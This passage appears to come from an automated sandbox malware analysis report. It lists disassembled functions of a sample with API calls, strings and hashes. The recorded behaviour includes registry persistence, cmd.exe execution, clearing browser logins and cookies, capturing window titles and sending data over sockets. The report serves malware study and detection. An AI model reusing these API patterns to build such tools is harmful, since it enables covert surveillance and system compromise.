                                                  • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: TUF
                                                  • API String ID: 1818849710-3431404234
                                                  • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                  • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                  • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                  • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                  Function 02102A3C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 02102A4A
                                                  • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A65
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: TUF
                                                  • API String ID: 1818849710-3431404234
                                                  • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                  • Instruction ID: 7286310e01be96e5283bd0e084c4da79290820e3581ae9a69b149428d13eb9e9
                                                  • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                  • Instruction Fuzzy Hash: B4E03071540204FFEF219BA19C09FDA3BA8EB04B95F004060FA05E6191D771CE04D794
                                                  Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                  • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                  • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                  • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                  Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetLastInputInfo$User32.dll
                                                  • API String ID: 2574300362-1519888992
                                                  • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                  • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                  • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                  • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                  Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                  • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                  • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                  • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                  Function 02138F72 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 34a4a8fdb2fbaed24085f9f51e48c21e05a0faa9b4c0d03c29d10533be22c836
                                                  • Instruction ID: 0f1ef37db0b0f428361c9b5d63b84fb7813fb3c8cc2f27486c9fb18780074c2e
                                                  • Opcode Fuzzy Hash: 34a4a8fdb2fbaed24085f9f51e48c21e05a0faa9b4c0d03c29d10533be22c836
                                                  • Instruction Fuzzy Hash: E1A18B72A807869FEB27CF28C8907BEBBE7EF55310F1841ADD4959B281C7B48941CB50
                                                  Function 0210BA8B Relevance: 6.2, APIs: 4, Instructions: 214registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0046BD30,00000000,00020019,?), ref: 0210BAAD
                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0210BAF1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumOpen
                                                  • String ID:
                                                  • API String ID: 3231578192-0
                                                  • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                  • Instruction ID: 24671abec11ea7b47993db04d479456eee55d73cacf8d456a2ca557c774bc214
                                                  • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                  • Instruction Fuzzy Hash: B58133321483449FD3A4EB20D850FEFB3E9EF94304F50492EE98686594EF30AA49DF56
                                                  Function 02145C31 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                  • Instruction ID: 60b7a5d7657021f3c6775de64a8da8d79c7dfc60cad5c6da4267d84d9a3e87ea
                                                  • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                  • Instruction Fuzzy Hash: 68417F316C02047FDB366B788C88AAE3AABEF15774F940215F42CD6290DF718A019BA1
                                                  Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                  • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                  • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                  • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                  Function 02131CE8 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                  • Instruction ID: 17be2fcaf2b45655af8d7656bd66d9e876c6239553c874b4b9447907ecdbb9ac
                                                  • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                  • Instruction Fuzzy Hash: CA410E72680744FFD7269F78CC44BAA7BFBEF49714F10856AE159DB280D77295018B80
                                                  Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: c10093164e1d5fb7eaa38f431242b8870439df387f8de07d06c271e3420c01d9
                                                  • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                  • Opcode Fuzzy Hash: c10093164e1d5fb7eaa38f431242b8870439df387f8de07d06c271e3420c01d9
                                                  • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                  Function 020F48EF Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 020F49DF
                                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 020F49F3
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 020F49FE
                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 020F4A07
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                  • Instruction ID: 62f78849b5106fbcf75fb352c6a25dbd86082564811b21dff88762afded744e9
                                                  • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                  • Instruction Fuzzy Hash: 7441B271288341AFC795EB20DC54DBFB7EEAF90310F04092DBE9282A90DF20D909EA55
                                                  Function 0214013A Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000006,?,00000000,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?), ref: 02140187
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000006,?,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?,?), ref: 02140210
                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,00000006,00000001,?,?,?,00000002,?), ref: 02140222
                                                  • __freea.LIBCMT ref: 0214022B
                                                    • Part of subcall function 02136D66: RtlAllocateHeap.NTDLL(00000000,0212468A,?), ref: 02136D98
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                  • String ID:
                                                  • API String ID: 2652629310-0
                                                  • Opcode ID: d6883ffe4d8719f2de826ec879274d1cc3acae2ccbd5fd9a5eba82e14a7f8a2b
                                                  • Instruction ID: f06988d33ebfc3e0a577b2b3e3b8f16907d052b9fc332a66c323bd2a3cb1c5f0
                                                  • Opcode Fuzzy Hash: d6883ffe4d8719f2de826ec879274d1cc3acae2ccbd5fd9a5eba82e14a7f8a2b
                                                  • Instruction Fuzzy Hash: 6831E172A4021AAFDF298F65DC40EBE7BA6EF48714F040168FD08D7190EB35C954CBA0
                                                  Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                  • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: 1ebdc9d393bd906508629a47cee4a4f9660b191437ef965b7b6c2574ee936d2b
                                                  • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                  • Opcode Fuzzy Hash: 1ebdc9d393bd906508629a47cee4a4f9660b191437ef965b7b6c2574ee936d2b
                                                  • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                  Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                    • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                    • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                  • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQuerySleepValue
                                                  • String ID: @CG$exepath$BG
                                                  • API String ID: 4119054056-3221201242
                                                  • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                  • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                  • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                  • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                  Function 0210178B Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 021028C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 021028E0
                                                    • Part of subcall function 021028C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 021028F9
                                                    • Part of subcall function 021028C4: RegCloseKey.ADVAPI32(?), ref: 02102904
                                                  • Sleep.KERNEL32(00000BB8), ref: 0210182A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQuerySleepValue
                                                  • String ID: @CG$exepath$BG
                                                  • API String ID: 4119054056-3221201242
                                                  • Opcode ID: 820c01e33afeab3fc0483e6c9ee435281bf1bbf0289cdfb463ea79f6631d800d
                                                  • Instruction ID: 4c64d6029b15c4c4cc15869cc741650c6e8a143ae341f9f50ebb0bdd477f6cc8
                                                  • Opcode Fuzzy Hash: 820c01e33afeab3fc0483e6c9ee435281bf1bbf0289cdfb463ea79f6631d800d
                                                  • Instruction Fuzzy Hash: 6B214892BC03042BC66476381C44AFF328FCBC1744F00453AFE1A976C7EF69C90996A9
                                                  Function 020F50B5 Relevance: 6.1, APIs: 4, Instructions: 79windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 020F50D8
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 020F5188
                                                  • TranslateMessage.USER32(?), ref: 020F5197
                                                  • DispatchMessageA.USER32(?), ref: 020F51A2
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 020F525A
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 020F5292
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID:
                                                  • API String ID: 2956720200-0
                                                  • Opcode ID: 822d3e8355dfe554be3e3a6cb7f23e7c77d447b8df2c12cbc1a70b6fed0e93d0
                                                  • Instruction ID: aa827aecfb0671048936071130a85b5c43e8a8a74b3188518f21854f4cca740c
                                                  • Opcode Fuzzy Hash: 822d3e8355dfe554be3e3a6cb7f23e7c77d447b8df2c12cbc1a70b6fed0e93d0
                                                  • Instruction Fuzzy Hash: EA218272544301ABC694FB74DD498AE7BB9AB85710F800A28FA1282894EF34D608DA52
                                                  Function 0041A98A Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                  • String ID:
                                                  • API String ID: 188215759-0
                                                  • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                  • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                  • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                  • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                  Function 0210ABF1 Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                  • String ID:
                                                  • API String ID: 188215759-0
                                                  • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                  • Instruction ID: ac9652ac0505f2516bc380b022d8dce95c4aa46cf73ff6b4d6a4b66dd2ee09c5
                                                  • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                  • Instruction Fuzzy Hash: 6F2121725083459FC304EF68D98489FB7E9EFC8754F054A2DF68593250EB74EA098BA3
                                                  Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                    • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                    • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                  • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                  • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                  • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                  • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                  • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                  Function 0210A053 Relevance: 6.1, APIs: 4, Instructions: 66serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 0210A063
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002), ref: 0210A077
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0210A084
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0210A0B9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$ChangeCloseConfigHandleManager
                                                  • String ID:
                                                  • API String ID: 110783151-0
                                                  • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                  • Instruction ID: 2d72cbf7876cbf09076c92c96980e6705ecf1a5090e42721994334fa8a50dd91
                                                  • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                  • Instruction Fuzzy Hash: 5201F5321883187EE6215B38AC9EF7F3EACDF466B0F000325F722961D6DB90D901C5A0
                                                  Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
